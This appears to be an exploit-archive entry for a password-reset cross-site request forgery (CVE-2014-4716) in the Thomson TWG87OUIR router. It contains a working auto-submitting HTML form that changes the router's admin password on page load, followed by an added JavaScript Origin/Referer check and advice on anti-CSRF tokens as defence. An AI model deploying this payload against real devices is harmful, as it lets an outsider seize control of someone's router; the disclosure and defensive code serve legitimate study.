
Thomson TWG87OUIR - POST Password Cross-Site Request Forgery

Author: nopesled
type: webapps
platform: hardware
date_added: 2014-06-25 
date_updated: 2014-06-25 
verified: 0 
codes: OSVDB-108397;CVE-2014-4716 

#Author: nopesled
#Date: 24/06/14
#Vulnerability: POST Password Reset CSRF
#Tested on: Thomson TWG87OUIR (Hardware Version)

<html>
<head>
	<title>Thomson TWG87OUIR CSRF</title>
</head>
<body>
	<form name="exploit" method="post"
		action="http://192.168.0.1/goform/RgSecurity">
		<input type="hidden" name="HttpUserId" value="" />
		<input type="hidden" name="Password" value="newpass" />
		<input type="hidden" name="PasswordReEnter" value="newpass" />
		<input type="hidden" name="RestoreFactoryNo" value="0x00" />
	</form>
	<script type="text/javascript">
		// Submits the form as soon as the page loads
		document.exploit.submit();
	</script>
</body>
</html>
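
The form above carries only fixed hidden values, so any page the administrator's browser loads can send it. The following is an added example, not part of the original advisory and not the vendor's firmware code: a server-side Origin/Referer check that a handler for a state-changing POST such as `/goform/RgSecurity` could apply. The function names, the request record shape and the sample requests are constructed for illustration.

```javascript
// Added example: same-origin check for state-changing requests.
// Requests are plain { method, headers } records constructed for this example.

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Return the "host[:port]" part of an Origin or Referer value, or null if unusable.
function sourceHost(value) {
  // "null" is what browsers send for opaque origins (sandboxed frame, local file)
  if (!value || value === "null") return null;
  try {
    return new URL(value).host.toLowerCase();
  } catch {
    return null; // malformed header value
  }
}

// Decide whether a request may change device state.
// allowedHosts: host values the admin UI is legitimately served from.
function checkStateChange(req, allowedHosts) {
  if (SAFE_METHODS.has(req.method.toUpperCase())) {
    return { allow: true, reason: "safe method" };
  }
  // Header names are case-insensitive, so normalise them first.
  const h = {};
  for (const [k, v] of Object.entries(req.headers)) h[k.toLowerCase()] = v;

  // Prefer Origin; fall back to Referer only when Origin is absent.
  const raw = h["origin"] !== undefined ? h["origin"] : h["referer"];
  if (raw === undefined) return { allow: false, reason: "no Origin or Referer" };

  const host = sourceHost(raw);
  if (host === null) return { allow: false, reason: "opaque or malformed source" };
  // Exact match only: a prefix or suffix comparison would accept look-alike hosts.
  if (!allowedHosts.includes(host)) return { allow: false, reason: "cross-site source " + host };
  return { allow: true, reason: "same-origin" };
}

// Constructed sample requests (192.168.0.1 is the address used in the form above).
const ALLOWED = ["192.168.0.1"];
const fromAdminUi = { method: "POST", headers: { Host: "192.168.0.1", Origin: "http://192.168.0.1" } };
const fromOtherSite = { method: "POST", headers: { Host: "192.168.0.1", Origin: "http://attacker.example" } };
const fromLocalFile = { method: "POST", headers: { Host: "192.168.0.1", Origin: "null" } };
const noSourceHeaders = { method: "POST", headers: { Host: "192.168.0.1" } };

for (const r of [fromAdminUi, fromOtherSite, fromLocalFile, noSourceHeaders]) {
  console.log(r.headers.Origin, "->", checkStateChange(r, ALLOWED));
}
```

A source check like this is a second layer. A per-session anti-CSRF token in the form and a required current-password field on the change request are the primary controls.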